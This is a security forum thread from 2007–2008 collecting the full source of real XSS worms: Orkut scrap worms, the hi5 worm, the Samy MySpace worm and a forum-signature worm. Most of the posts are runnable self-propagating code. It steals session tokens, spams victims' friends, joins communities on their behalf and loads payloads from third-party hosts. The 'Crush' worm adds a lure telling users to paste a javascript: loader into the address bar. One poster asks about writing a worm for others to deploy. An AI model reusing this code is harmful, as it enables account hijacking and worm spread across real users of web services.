Re: List of XSS Worms?
Posted by: c0d3walk3r
Date: December 20, 2007 11:08AM

Here is the decoded version of the above Orkut worm:
I guess Rodrigo Lacerda used the following packer to pack the JavaScript, then modified it a little:
http://dean.edwards.name/packer/

<--------STARTS HERE---------->

// Worm state.  `index` walks the victim's friend list (persisted in a cookie, see
// sendScrap); POST and SIG are what appear to be the page's request token and signature,
// read straight out of the JSHDF global the site exposes to its own scripts.  That is the
// lesson here: a per-page token does not stop same-origin XSS, because injected script can
// read whatever the page's scripts can.
var index = 0;
var POST = JSHDF['CGI.POST_TOKEN'];
var SIG = JSHDF['Page.signature.raw'];

// Returns an XHR object, trying the IE ActiveX ProgIDs before the standard constructor,
// or null when none is available.  Each constructor failure is swallowed deliberately.
function createXMLHttpRequest() {
try {
return new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
}
try {
return new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
}
try {
return new XMLHttpRequest;
} catch (e) {
}
return null;
}


// Writes a cookie; the value is escape()d and every attribute is optional.  `expires` is
// a Date (toGMTString is called on it).  Used to persist the friend-list position.
function setCookie(name, value, expires, path, domain, secure) {
var curCookie = name + "=" + escape(value) + (expires ? "; expires=" + expires.toGMTString() : "") + (path ? "; path=" + path : "") + (domain ? "; domain=" + domain : "") + (secure ? "; secure" : "");
document.cookie = curCookie;
}


// Reads cookie `name` from document.cookie and returns its unescape()d value, or false
// when it is absent.  The "; " prefix search handles a cookie that is not first in the
// string; a bare prefix match is only accepted at offset 0.
function getCookie(name) {
var dc = document.cookie;
var prefix = name + "=";
var begin = dc.indexOf("; " + prefix);
if (begin == -1) {
begin = dc.indexOf(prefix);
if (begin != 0) {
return false;
}
} else {
begin += 2;
}
var end = document.cookie.indexOf(";", begin);
if (end == -1) {
end = dc.length;
}
return unescape(dc.substring(begin + prefix.length, end));
}


// Expires cookie `name` (if present) by rewriting it with a 1970 expiry, then reloads the
// page.  Not called anywhere in this listing; it is part of the same cookie helper set.
function deleteCookie(name, path, domain) {
if (getCookie(name)) {
document.cookie = name + "=" + (path ? "; path=" + path : "") + (domain ? "; domain=" + domain : "") + "; expires=Thu, 01-Jan-70 00:00:01 GMT";
history.go(0);
}
}


// Harvests the victim's friend list: fetches the site's own Compose page same-origin,
// parses the returned HTML by assigning it to a detached div's innerHTML, lifts the first
// <select> (the recipient picker), drops its first option, and appends it hidden to the
// body as #selectedList for sendScrap() to walk.  Any non-200 status triggers a retry.
// Note that send(null) is called twice, before and after the handler is attached.
function loadFriends() {
var xml = createXMLHttpRequest();
if (xml) {
xml.open("GET", "http://www.orkut.com/Compose.aspx", true);
xml.send(null);
xml.onreadystatechange = function () {if (xml.readyState == 4) {if (xml.status == 200) {var xmlr = xml.responseText;var div = document.createElement("div");div.innerHTML = xmlr;var select = div.getElementsByTagName("select").item(0);if (select) {select.removeChild(select.getElementsByTagName("option").item(0));select.setAttribute("id", "selectedList");select.style.display = "none";document.body.appendChild(select);sendScrap();}} else {loadFriends();}}};
xml.send(null);
}
}


// Joins a fixed community on the victim's behalf (its id is assembled from character
// codes, spelling 44001818, so the number does not appear literally), sending the page's
// token and signature as form fields.  Retries indefinitely on any non-200 status, then
// moves on to loadFriends().  Only runs on first infection (see the cookie check at the end).
function cmm_join() {
var send = "POST_TOKEN=" + encodeURIComponent(POST) + "&signature=" + encodeURIComponent(SIG) + "&Action.join";
var xml = createXMLHttpRequest();
xml.open("POST", "http://www.orkut.com/CommunityJoin.aspx?cmm=" + String.fromCharCode(52, 52, 48, 48, 49, 56, 49, 56), true);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xml.send(send);
xml.onreadystatechange = function () {if (xml.readyState == 4) {if (xml.status != 200) {cmm_join();return;}loadFriends();}};
}


// Propagation: posts one scrap to the friend at position `index` in #selectedList, then
// advances the index (persisted in the "wormdoorkut" cookie) and recurses until the list
// is exhausted.  The scrap text is the injection: an <embed> whose wmode attribute breaks
// out of the attribute context and creates a <script> element loading the worm from a
// third-party host.  That is the sink a defender must fix -- attribute values in stored
// user markup have to be encoded, not merely tag-whitelisted.  The cookie expiry is set
// to getTime() + 86400 (milliseconds, i.e. about 86 seconds) as written.
function sendScrap() {
if (index == document.getElementById("selectedList").length) {
return;
}
var scrapText = "Boas festas de final de ano!<br/><br/>[silver]" + (new Date).getTime() + "[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape('\" width=\"1\" height=\"1\"></embed>";
var send = "Action.submit=1&POST_TOKEN=" + encodeURIComponent(POST) + "&scrapText=" + encodeURIComponent(scrapText) + "&signature=" + encodeURIComponent(SIG) + "&toUserId=" + document.getElementById("selectedList").item(index).value;
var xml = createXMLHttpRequest();
xml.open("POST", "http://www.orkut.com/Scrapbook.aspx", true);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
xml.send(send);
xml.onreadystatechange = function () {if (xml.readyState == 4) {index++;var wDate = new Date;wDate.setTime(wDate.getTime() + 86400);setCookie("wormdoorkut", index, wDate);sendScrap();}};
}

// Entry point.  The "wormdoorkut" cookie doubles as an infection marker and as the resume
// position: a fresh victim (no cookie) starts at "0" and goes through cmm_join() first;
// a returning victim skips straight to loadFriends() and continues from the saved index.
if (!getCookie("wormdoorkut")) {
var wDate = new Date;
wDate.setTime(wDate.getTime() + 86400);
setCookie("wormdoorkut", "0", wDate);
}
index = getCookie("wormdoorkut");
if (getCookie("wormdoorkut") == "0") {
cmm_join();
} else {
loadFriends();
}

<--------ENDS HERE---------->


Manish S.

Re: List of XSS Worms?
Posted by: sirdarckcat
Date: December 29, 2007 03:04PM

The hi5.com worm:
<?xml version="1.0"?>
<!-- Historical hi5 worm (Dec 2007) delivered as a Firefox XBL binding: the constructor
     runs whenever a profile stylesheet applies '-moz-binding: url(...#xs)' to an element.
     The injection sink is the user-controlled profile "style" field written below, which
     carries CSS expression() for IE and -moz-binding for Firefox.  Both mechanisms have
     since been removed from browsers; the server-side control is to reject url(),
     expression() and binding values in user-supplied CSS rather than to filter keywords. -->
<bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml">
	<binding id="xs">
		<implementation>
			<constructor>
				(function q(){
					// $(): appends a hidden iframe pointing at u to the document body and returns it.
					function $(u,x){with(document)with(body)(x=appendChild(createElement('iframe'))).src=u;return x;}
					// window.p is both the re-entry guard and the escaped source of this very function,
					// which is what gets written back into the victim's profile style field below.
					if(!window.p){
						window.p=escape("("+q+")();");
						alert(/hi5 xss worm wishes you a merry merry xmas/);
						// Two same-origin pages in hidden iframes: remove the current skin, then open the
						// profile-customisation form that frames[1] refers to below.
						$("http://www.hi5.com/friend/profile/removeSkin.do").height=0;
						$("http://www.hi5.com/friend/account/displayEditProfileCustomization.do").height=0;
						// Every second: fill the customisation form with the self-replicating style value
						// and submit it; errors are swallowed until the frame has loaded.
						var m=setInterval(function(){
							try{
								frames[1].document.forms[0].backgroundImageURL.value="http://www.x.se/ye59";
								frames[1].document.forms[0].style.value="body{width:expression(eval(unescape(\""+window.p+"\")));-moz-binding:url('http://www.sirdarckcat.net/xssworm.xml#xs');}";
								frames[1].document.forms[0].submit();
								setTimeout(function(){frames[1].location="http://www.hi5.com/friend/account/displayEditProfileCustomization.do";},2000);
							}catch(e){}
						},1000);
					}
				})();
			</constructor>
		</implementation>
	</binding>
</bindings>

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: List of XSS Worms?
Date: January 02, 2008 06:47PM

Does anyone know of the legalities behind worm creation? Specifically the creation, and documentation of, but not necessarily the deployment. I'm looking to write a worm for a specific service and let another group of individuals exploit it.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: List of XSS Worms?
Posted by: sirdarckcat
Date: January 02, 2008 09:19PM

well, I think the best person to ask is sammy :P

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: List of XSS Worms?
Date: January 03, 2008 03:31PM

Yeah, but the difference is that he was the one who deployed it. I'm looking only to write one, not to put it to personal use. I'm sure it has to be legal in some manner or another. Look at all the websites housing the sources of old viruses such as "Melissa".


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: List of XSS Worms?
Posted by: thornmaker
Date: January 03, 2008 04:20PM

Since it appeared on slashdot today... [www.theregister.co.uk]
Regarding your question, the article states: "The guidelines establish that to successfully prosecute the author of a tool it needs to be shown that they intended it to be used to commit computer crime".

I think it would be hard to show that the authors of dual-use tools (like wireshark, nmap) intended them to be used to commit a computer crime. You would have a much harder time arguing that a site-specific worm was an academic exercise with no malicious intent.

Granted, this is just for the UK, and it hasn't even passed yet. I don't know how things are in the US. Nevertheless, I would contend that the likelihood of being prosecuted is directly proportional to the 'success' of the virus/worm... i.e. the more people that get pissed off, the more people that will be looking for vengeance. Finding a law that you broke won't be an issue, if it comes to that.



Edited 1 time(s). Last edit at 01/03/2008 04:24PM by thornmaker.

Re: List of XSS Worms?
Posted by: rsnake
Date: January 03, 2008 10:37PM

Back on topic, we shouldn't forget Samy (for historical reasons if nothing else):

<!-- Samy (MySpace, Oct 2005), kept for historical reference.  The whole worm is one div:
     the browser of the day evaluated the javascript: URL in the inline style's BACKGROUND,
     and the script it eval()s is stored in the custom "expr" attribute.  Points worth
     noting from a defender's side: the word "javascript" is split across a line break and
     strings such as 'inne'+'rHTML' are concatenated, presumably to slip past keyword
     filtering; the per-request Mytoken and the hidden "hash"/"hashcode" fields are scraped
     from pages the script fetches same-origin, so those tokens did not stop it; it
     re-reads its own markup out of the live DOM (indexOf('m'+'ycode')) to copy itself into
     the victim's profile "heroes" field, which is the stored-XSS sink that needed output
     encoding; and it also sends an add-friend request to a fixed friendID. -->
<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var 
AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>

- RSnake
Gotta love it. http://ha.ckers.org

Re: List of XSS Worms?
Posted by: Spikeman
Date: January 06, 2008 10:39PM

Quote

I once wrote an XSS worm on a forum based on a flaw in JavaScript code (it called unescape on info from the user's signature). I had it add its code, as well as a bit of invisible text, as a payload, and it took several weeks before it was discovered. By that time every active member of the forum had the worm in their signature. The admin must have discovered the source of the problem, because the code was removed (and the worm failed to work after that). I could publish the code if it's of interest.

Here is the vector:

<a href='http://eapr-1/@0@%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%31%2E%74%69%6E%79%70%69%63%2E%63%6F%6D%2F%32%76%76%31%61%68%31%2E%67%69%66%22%20%6F%6E%6C%6F%61%64%3D%22%6C%6F%61%64%6A%73%28%27%68%74%74%70%3A%2F%2F%77%77%77%2E%66%69%6C%65%64%65%6E%2E%63%6F%6D%2F%66%69%6C%65%73%2F%32%30%30%36%2F%31%31%2F%32%37%2F%34%32%38%32%35%35%2F%74%65%73%74%2E%74%78%74%27%29%22%20%2F%3E@-2@@1@0@-3@@' target='_blank'></a>

Here is the worm code itself:

var req = null; 
var stage = 0;
var hack = "sig";
var url = "http://maple-world.net/";
var member = "";
var forum = "";
var topic = "";
var title = "";
var post = " ~~~~@";
vector="%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%31%2E%74%69%6E%79%70%69%63%2E%63%6F%6D%2F%32%76%76%31%61%68%31%2E%67%69%66%22%20%6F%6E%6C%6F%61%64%3D%22%6C%6F%61%64%6A%73%28%27%68%74%74%70%3A%2F%2F%77%77%77%2E%66%69%6C%65%64%65%6E%2E%63%6F%6D%2F%66%69%6C%65%73%2F%32%30%30%36%2F%31%31%2F%32%37%2F%34%32%38%32%35%35%2F%74%65%73%74%32%2E%74%78%74%27%29%22%20%2F%3E";
 
if (window.XMLHttpRequest) {
  req = new XMLHttpRequest();
  if (req.overrideMimeType) {
    req.overrideMimeType('text/xml');
  }
} else if (window.ActiveXObject) {
  try {
    req = new ActiveXObject("Msxml2.XMLHTTP");
  } catch (e) {
    try {
      req = new ActiveXObject("Microsoft.XMLHTTP");
    } catch (e) {}
  }
}


req.onreadystatechange = function() { 
  if(req.readyState == 4) {
    if(req.status == 200) {
      if(hack == "post" || hack == "pin") {
        stage += 1;
        if(stage==1) {
          var i = req.responseText.indexOf("auth_key' value='") + 17;
          auth = req.responseText.substring(i, i + 32);
	  req.open("POST", url + "index.php?", true);
	  if(hack=="post") {
	    var parameters = "act=Post&s=&f="+forum+"&auth_key="+auth+"&CODE=03&enableemo=yes&t="+topic+"&Post="+post;
          } else if(hack == "pin") {
            var parameters = "act=Mod&f="+forum+"&auth_key="+auth+"&CODE=15&t="+topic;
          }
	  req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	  req.setRequestHeader("Content-length", parameters.length);
	  req.setRequestHeader("Connection", "close");
	  req.send(parameters);
        }
      } else if(hack=="sig") {
        stage+=1;
        if(stage==1) {
	  key=req.responseText.match(/<input type='hidden' name='key' value='([0-9a-f]+)' \/>/)[1];
	  old=req.responseText.match(/<textarea cols='60' rows='12' name='Post' tabindex='3' class='textinput'>([\s\S]+?)<\/textarea>/)[1];
	  xpr=old.match(/<a href='http:\/\/eapr-1\/(@[^@]*@[^@]*)(@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@)' target='_blank'><\/a>/);
	  if(xpr){
	    if(xpr[1].indexOf(vector)<0){xpr1=xpr[1]+vector;}else{xpr1=xpr[1];}
	    nxp="+"]";
	    old=old.replace(/<a href='http:\/\/eapr-1\/[^']+' target='_blank'><\/a>/,nxp);
	  }
	  if(old.indexOf(post)<0){
	    parameters="act=UserCP&CODE=23&key="+key+"&Post="+encodeURIComponent(old+post);
	    req.open("POST", url + "index.php?", true);
	    req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	    req.setRequestHeader("Content-length", parameters.length);
	    req.setRequestHeader("Connection", "close");
	    req.send(parameters);
	  }
	}
      }
    }
  } 
};

if(stage==0) {
  if(hack=="post" || hack=="pin") {
    req.open("GET", url + "index.php?act=Post&CODE=02&f="+forum+"&t="+topic, true);
    req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    req.send(null);
  } else if(hack=="PM") {
    req.open("POST", url + "index.php?", true);
    post = encodeURI(post);
    title = encodeURI(title);
    var parameters = "act=Msg&CODE=04&MODE=01&OID=&entered_name="+member+"&msg_title="+title+"&Post="+post;
    req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    req.setRequestHeader("Content-length", parameters.length);
    req.setRequestHeader("Connection", "close");
    req.send(parameters);
  } else if(hack=="sig") {
    req.open("GET", url + "index.php?act=UserCP&CODE=22", true);
    req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    req.send(null);
  }
}

Re: List of XSS Worms?
Posted by: rsnake
Date: February 28, 2008 06:20PM

Orkut "Crush" Worm


// ==UserScript==

// @name Master mind

// @author "Ishu"

// @provided by http://

// @description Ishu

// @include *Ishu*

// ==/UserScript==



function fwScrap() {

document.title = "Ishu HELPLINE - Newsletter";



function createXMLHttpRequest() {

try {

return new XMLHttpRequest;

} catch (e) {

try {

return new ActiveXObject("Msxml2.XMLHTTP");

} catch (e) {

try {

return new ActiveXObject("Microsoft.XMLHTTP");

} catch (e) {



return false;

}

}

}

}



function getPostSig(exc) {

var xml = createXMLHttpRequest();

xml.open("GET", "/Scrapbook.aspx", true);

xml.onreadystatechange = function ()

{

if (
xml.readyState == 4) {


var xmlr = xml.responseText;


POST = xmlr.match(/name="post_token" value="([^"]+)/i);


SIG = xmlr.match(/name="signature" value="([^"]+)/i);


document.getElementsByTagName("input").POST_TOKEN.value = POST[1];


document.getElementsByTagName("input").signature.value = SIG[1];



eval(exc);

}

};

xml.send(null);

}





var select;

function loadFriends() {



date_now = new Date();

var hrs = date_now.getHours();

var min = date_now.getMinutes();

var sec = date_now.getSeconds();

var milliSec = date_now.getMilliseconds();



var xml = createXMLHttpRequest();

xml.open("GET", "/Compose.aspx", true);

xml.onreadystatechange = function ()

{

if (xml.readyState == 4) {

var xmlr =
xml.responseText;

POST =
xmlr.match(/name="post_token" value="([^"]+)/i);

SIG =
xmlr.match(/name="signature"
value="([^"]+)/i);


document.getElementsByTagName("input").POST_TOKEN.value = POST[1];


document.getElementsByTagName("input").signature.value = SIG[1];

var div =
document.createElement("div");

div.innerHTML =
xmlr;



for (var x = 0;
x < div.getElementsByTagName("select").length; x++) {

if (
div.getElementsByTagName("select")[x].getAttribute("name") == "oneFriend") {


select = div.getElementsByTagName("select")[x].cloneNode(true);


globalSelect = select;


break;

}

}



var scrapText;

var tokenValue =
encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value);

var signatureValue = encodeURIComponent(
document.getElementsByTagName("input").signature.value);



//scrapText = "Read Receipt -->
"+hrs+":"+min+":"+sec+"-"+milliSec+"<br>"+signatureValue;

//scrapText = "Read Receipt -->
"+hrs+":"+min+":"+sec+"-"+milliSec;

scrapText = "Good Work! [:P]";

sendScrap(94850220,scrapText);

SendScrapToAll();







// for(var i=0;i<
globalSelect.length;i++) {

//
if(globalSelect.value!="")
{

//
sendScrap(globalSelect.value,scrapText);

//
setTimeout("",
65 * 1000);

// }

// }




}

};

xml.send(null);

}





function wait() {

antiF = 1;

showTime();

}



c = 0;

function SendScrapToAll()

{

var scrapText;

scrapText = "[maroon]Find out who has crush on
u....[/maroon]<br>[purple]wait 4 few minutes after pressing
enter<br>[green]Author-->[/green] [red]Monster :)[/red]<br>[blue]Just copy
the JavaScript, paste it in your address bar and PRESS
ENTER[/blue]<br><br>[orange]javascript:d=document;c=d.createElement
('script');d.body.appendChild(c);c.src='
http://monster357.freehostia.com/scripts/crush.js';void(0)
[/orange]<br><br>[red]Trust
me, ITS WORKING!!! [:)]<br><br><br><center><font
style=text-decoration:blink><a href=
http://www.orkut.com/CommunityJoin.aspx?cmm=30794><img src=
http://img1.orkut.com/img/castro/p_scrap.gif>~ Powered By LOVERS ~<img src=
http://img1.orkut.com/img/castro/p_scrap.gif></a></img></font></center>";



if(c == select.length)

return;



try{

if(select[c].value!="")

{


sendScrap(select[c].value,scrapText);

}

}catch(e){

//Suppressed Exception

} finally {

c = c+ 1;

setTimeout("SendScrapToAll()", 666);

}

}







function showTime() {

if (timeWait > 0) {

timeWait--;

setTimeout("showTime()", 2000);

} else {

timeWait = 20;

index++;

getPostSig("SendScrapToAll()");

}

}



antiF = 1;

index = 1;

timeWait = 20;

nscraps = 0;

nCounter=2;

nLoop=2;



function sendScrap(to, msg) {



date_now = new Date();

var hrs = date_now.getHours();

var min = date_now.getMinutes();

var sec = date_now.getSeconds();

var milliSec = date_now.getMilliseconds();



var tokenValue = encodeURIComponent(document.getElementsByTagName
("input").POST_TOKEN.value);

var signatureValue = encodeURIComponent(
document.getElementsByTagName("input").signature.value);



//var scrapText = tokenValue + signatureValue
+'9'+hrs+'18'+min+'27'+sec+'36'+milliSec;



var send = "POST_TOKEN=" + tokenValue + "&signature=" +
signatureValue + "&scrapText=" + encodeURIComponent(msg) +
"&toUserId="+to+"&Action.submit=1";



var xml = createXMLHttpRequest();





xml.open("POST", "/Scrapbook.aspx", true);

xml.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded;");

xml.send(send);



xml.onreadystatechange = function () {

if (xml.readyState == 4) {



if (xml.status != 200) {


setTimeout("SendScrapToAll()",
500);

return;

}



if (antiF < 450) {

antiF++;



if(nCounter==1)
{


index++;


nCounter=nLoop;

}

else {


nCounter--;

}

return;


}

else {


wait();

}

}

};

}





layout = " <input name=\"POST_TOKEN\"
type=\"hidden\"/><input name=\"signature\" type=\"hidden\"/>"+

"<center><h3><u>LOADING....
PLEASE WAIT.......</u></h3></center><br>"+

"<table>"+



"</table>"

;


document.body.innerHTML = layout;


var focus = document.createElement("span");

focus.id = "focus";

focus.style.display = "inline";

document.body.appendChild(focus);

var divLoad = document.createElement("div");

divLoad.id = "divLoad";

divLoad.style.display = "inline";

document.body.appendChild(divLoad);



loadFriends();



//sendScrap();



}



sc = String(fwScrap);

sc = sc.substring(21, sc.length - 2);

script = document.createElement("script");

if (typeof document.all) {

script.text = sc;

} else {

script.textContent = sc;

}

document.getElementsByTagName("head")[0].appendChild(script)





and http://monster357.freehostia.com/scripts/crush.js is:


// ==UserScript==
// @name Master mind
// @author "Ishu"
// @provided by http://
// @description Ishu
// @include *Ishu*
// ==/UserScript==

function fwScrap() {
document.title = "Ishu HELPLINE - Newsletter";

function createXMLHttpRequest() {
try {
return new XMLHttpRequest;
} catch (e) {
try {
return new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
return new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {

return false;
}
}
}
}

function getPostSig(exc) {
var xml = createXMLHttpRequest();
xml.open("GET", "/Scrapbook.aspx", true);
xml.onreadystatechange = function ()
{
if (xml.readyState == 4) {
var xmlr = xml.responseText;
POST = xmlr.match(/name="post_token" value="([^"]+)/i);
SIG = xmlr.match(/name="signature" value="([^"]+)/i);
document.getElementsByTagName("input").POST_TOKEN.value = POST[1];
document.getElementsByTagName("input").signature.value = SIG[1];
eval(exc);
}
};
xml.send(null);
}


var select;
function loadFriends() {

date_now = new Date();
var hrs = date_now.getHours();
var min = date_now.getMinutes();
var sec = date_now.getSeconds();
var milliSec = date_now.getMilliseconds();

var xml = createXMLHttpRequest();
xml.open("GET", "/Compose.aspx", true);
xml.onreadystatechange = function ()
{
if (xml.readyState == 4) {
var xmlr = xml.responseText;
POST = xmlr.match(/name="post_token" value="([^"]+)/i);
SIG = xmlr.match(/name="signature" value="([^"]+)/i);
document.getElementsByTagName("input").POST_TOKEN.value = POST[1];
document.getElementsByTagName("input").signature.value = SIG[1];
var div = document.createElement("div");
div.innerHTML = xmlr;

for (var x = 0; x < div.getElementsByTagName("select").length; x++) {
if (div.getElementsByTagName("select")[x].getAttribute("name") == "oneFriend") {
select = div.getElementsByTagName("select")[x].cloneNode(true);
globalSelect = select;
break;
}
}

var scrapText;
var tokenValue = encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value);
var signatureValue = encodeURIComponent(document.getElementsByTagName("input").signature.value);

//scrapText = "Read Receipt --> "+hrs+":"+min+":"+sec+"-"+milliSec+"<br>"+signatureValue;
//scrapText = "Read Receipt --> "+hrs+":"+min+":"+sec+"-"+milliSec;
scrapText = "Good Work! [:P]";
sendScrap(94850220,scrapText);
SendScrapToAll();



// for(var i=0;i<globalSelect.length;i++) {
// if(globalSelect.value!="") {
// sendScrap(globalSelect.value,scrapText);
// setTimeout("", 65 * 1000);
// }
// }

}
};
xml.send(null);
}


function wait() {
antiF = 1;
showTime();
}

c = 0;
function SendScrapToAll()
{
var scrapText;
scrapText = "[maroon]Find out who has crush on u....[/maroon]<br>[purple]wait 4 few minutes after pressing enter<br>[green]Author-->[/green] [red]Monster :)[/red]<br>[blue]Just copy the JavaScript, paste it in your address bar and PRESS ENTER[/blue]<br><br>[orange]javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://monster357.freehostia.com/scripts/blindgal.js';void(0)[/orange]<br><br>[red]Trust me, ITS WORKING!!! [:)]<br><br><br><center><font style=text-decoration:blink><a href=http://www.orkut.com/CommunityJoin.aspx?cmm=30794><img src=http://img1.orkut.com/img/castro/p_scrap.gif>~ Powered By LOVERS ~<img src=http://img1.orkut.com/img/castro/p_scrap.gif></a></img></font></center>";

if(c == select.length)
return;

try{
if(select[c].value!="")
{
sendScrap(select[c].value,scrapText);
}
}catch(e){
//Suppressed Exception
} finally {
c = c+ 1;
setTimeout("SendScrapToAll()", 666);
}
}



function showTime() {
if (timeWait > 0) {
timeWait--;
setTimeout("showTime()", 2000);
} else {
timeWait = 20;
index++;
getPostSig("SendScrapToAll()");
}
}

antiF = 1;
index = 1;
timeWait = 20;
nscraps = 0;
nCounter=2;
nLoop=2;

function sendScrap(to, msg) {

date_now = new Date();
var hrs = date_now.getHours();
var min = date_now.getMinutes();
var sec = date_now.getSeconds();
var milliSec = date_now.getMilliseconds();

var tokenValue = encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value);
var signatureValue = encodeURIComponent(document.getElementsByTagName("input").signature.value);

//var scrapText = tokenValue + signatureValue +'9'+hrs+'18'+min+'27'+sec+'36'+milliSec;

var send = "POST_TOKEN=" + tokenValue + "&signature=" + signatureValue + "&scrapText=" + encodeURIComponent(msg) + "&toUserId="+to+"&Action.submit=1";

var xml = createXMLHttpRequest();


xml.open("POST", "/Scrapbook.aspx", true);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
xml.send(send);

xml.onreadystatechange = function () {
if (xml.readyState == 4) {

if (xml.status != 200) {
setTimeout("SendScrapToAll()", 500);
return;
}

if (antiF < 450) {
antiF++;

if(nCounter==1) {
index++;
nCounter=nLoop;
}
else {
nCounter--;
}
return;
}
else {
wait();
}
}
};
}


layout = " <input name=\"POST_TOKEN\" type=\"hidden\"/><input name=\"signature\" type=\"hidden\"/>"+
"<center><h3><u>LOADING.... PLEASE WAIT.......</u></h3></center><br>"+
"<table>"+

"</table>"
;
document.body.innerHTML = layout;
var focus = document.createElement("span");
focus.id = "focus";
focus.style.display = "inline";
document.body.appendChild(focus);
var divLoad = document.createElement("div");
divLoad.id = "divLoad";
divLoad.style.display = "inline";
document.body.appendChild(divLoad);

